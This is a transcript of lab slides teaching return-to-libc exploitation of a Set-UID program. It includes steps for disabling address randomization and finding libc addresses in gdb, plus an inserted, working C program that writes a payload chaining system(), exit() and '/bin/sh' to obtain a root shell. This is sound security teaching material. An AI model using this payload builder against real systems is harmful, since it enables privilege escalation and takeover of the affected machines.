Return-to-libc Lab

Zutao Zhu, 09/25/2009
Presentation Transcript


  1. Return-to-libc Lab Zutao Zhu 09/25/2009

  2. Outline • Review of the Set-UID assignment • Discussion of the Buffer-overflow Lab • Return-to-libc

  3. Review Set-UID assignment • Capture your screen, please. • Describe and explain the assignment in detail. • To prove you have root privilege, printf(“This is my ls\n”) is not enough: any process can print that string. • “Make myprog a Set-UID root program, and run it in the root account.”

  4. Review Set-UID assignment • Refer to the lecture note: "To make sure Set-UID programs are safe from the manipulation of the LD_PRELOAD environment variable, the runtime linker/loader (ld.so) will ignore this environment variable if the program is a Set-UID root program, unless the real UID is also zero."

  5. Buffer-overflow • The shellcode on the stack is executed from the low memory address toward the high memory address, like any other code. • Use “disassemble main” in gdb to see the order of the instructions.

  6. Buffer-overflow • Stack frame for stack.c • Use “info frame” in gdb, and make sure you are inside the function whose frame you are interested in (the function that owns the overflowed buffer).

  7. Return-to-libc • How do we get the addresses of the libc functions system() and exit()? • How do we expose a string such as “/bin/sh” in memory? • How do we get the address of the exposed string? • How do we pass arguments to these functions without executing any code of our own?

  8. Return-to-libc • Step 1. Disable address-space randomization: /sbin/sysctl -w kernel.randomize_va_space=0 • Step 2. Link /bin/sh to /bin/zsh, because the shell /bin/sh normally points to drops Set-UID privileges when the effective UID differs from the real UID. • Step 3. Expose the string “/bin/sh” in memory, e.g. through an environment variable. • Step 4. Use gdb to get the addresses of system() and exit() (p system, p exit). • Step 5. Get the address of the exposed “/bin/sh” string. • Step 6. Calculate the offset from the start of the overflowed buffer to the saved return address.

  9. Return-to-libc • Chain the calls together: overwrite the saved return address with the address of system(); the next word is the address of exit(), which system() returns to; the word after that is the address of “/bin/sh”, which system() reads as its argument.

  10. Return-to-libc • Use “id” in the shell you obtain to check the current user information; the effective UID (euid) should be 0 (root).
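The following program is an added example, not code from the original slides or the lab: it lays out the chain from slides 8 and 9 for a 32-bit x86 stack and writes it to a file for the vulnerable program to read. Everything environment-specific is an assumption supplied on the command line: the offset of the saved return address from the start of the buffer (from “info frame”), the addresses of system() and exit() (from “p system” and “p exit” in gdb), and the address of the exposed “/bin/sh” string. The file name badfile, the payload length 517 and the illustrative addresses in the usage message are likewise assumptions. The NUL-byte check matters because the victim typically copies the payload with strcpy(), which stops at the first 0x00 byte.

```c
/* Added example (not from the original slides): build a return-to-libc
 * payload for a 32-bit x86 stack frame.  Assumed layout of the overflow:
 *
 *   buf[0 .. ret_offset-1]      filler
 *   buf[ret_offset   .. +3]     address of system()   (overwrites the saved EIP)
 *   buf[ret_offset+4 .. +7]     address of exit()     (system()'s "return address")
 *   buf[ret_offset+8 .. +11]    address of "/bin/sh"  (system()'s first argument)
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAYLOAD_LEN 517   /* assumption: size of the file the victim reads */

/* Store a 32-bit value little-endian, as an x86 stack slot expects. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = (unsigned char)(v & 0xff);
    dst[1] = (unsigned char)((v >> 8) & 0xff);
    dst[2] = (unsigned char)((v >> 16) & 0xff);
    dst[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Returns 1 if any byte of v is 0x00: strcpy() in the victim would stop
 * there and the rest of the chain would never reach the stack. */
int has_nul_byte(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}

/* Lay out the chain in buf.  ret_offset is the distance from the start of
 * the overflowed buffer to the saved return address.  Returns 0 on success,
 * -1 if the three words do not fit or an address carries a NUL byte. */
int build_payload(unsigned char *buf, size_t len, size_t ret_offset,
                  uint32_t system_addr, uint32_t exit_addr, uint32_t sh_addr)
{
    if (len < ret_offset + 12)
        return -1;
    if (has_nul_byte(system_addr) || has_nul_byte(exit_addr) || has_nul_byte(sh_addr))
        return -1;
    memset(buf, 'A', len);                        /* filler: any non-NUL byte */
    put_le32(buf + ret_offset,     system_addr);  /* fake saved EIP -> system() */
    put_le32(buf + ret_offset + 4, exit_addr);    /* where system() "returns" */
    put_le32(buf + ret_offset + 8, sh_addr);      /* system()'s argument */
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 5) {
        fprintf(stderr,
                "usage: %s <ret_offset> <system_addr> <exit_addr> <sh_addr>\n"
                "  e.g. %s 24 0xb7e9b430 0xb7e90fb0 0xbffffe7c  (illustrative values only)\n",
                argv[0], argv[0]);
        return 1;
    }
    size_t   ret_offset  = (size_t)strtoul(argv[1], NULL, 0);
    uint32_t system_addr = (uint32_t)strtoul(argv[2], NULL, 0);
    uint32_t exit_addr   = (uint32_t)strtoul(argv[3], NULL, 0);
    uint32_t sh_addr     = (uint32_t)strtoul(argv[4], NULL, 0);

    unsigned char buf[PAYLOAD_LEN];
    if (build_payload(buf, sizeof buf, ret_offset, system_addr, exit_addr, sh_addr) != 0) {
        fprintf(stderr, "chain does not fit, or an address contains a NUL byte\n");
        return 1;
    }
    FILE *f = fopen("badfile", "wb");
    if (f == NULL || fwrite(buf, 1, sizeof buf, f) != sizeof buf) {
        perror("badfile");
        return 1;
    }
    fclose(f);
    return 0;
}
```

The saved return address is replaced by system(), so when the vulnerable function returns, system() starts executing with the stack looking exactly as if it had been called: the word at the top is its return address (exit(), so the program terminates cleanly instead of crashing) and the word after it is its first argument, the pointer to “/bin/sh”. If the addresses printed by gdb differ from the addresses at run time, check that randomization is still disabled and that the program name and environment are the same in both runs, since they shift the stack.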

  11. References • http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf • http://milw0rm.org/papers/31

  12. Questions?
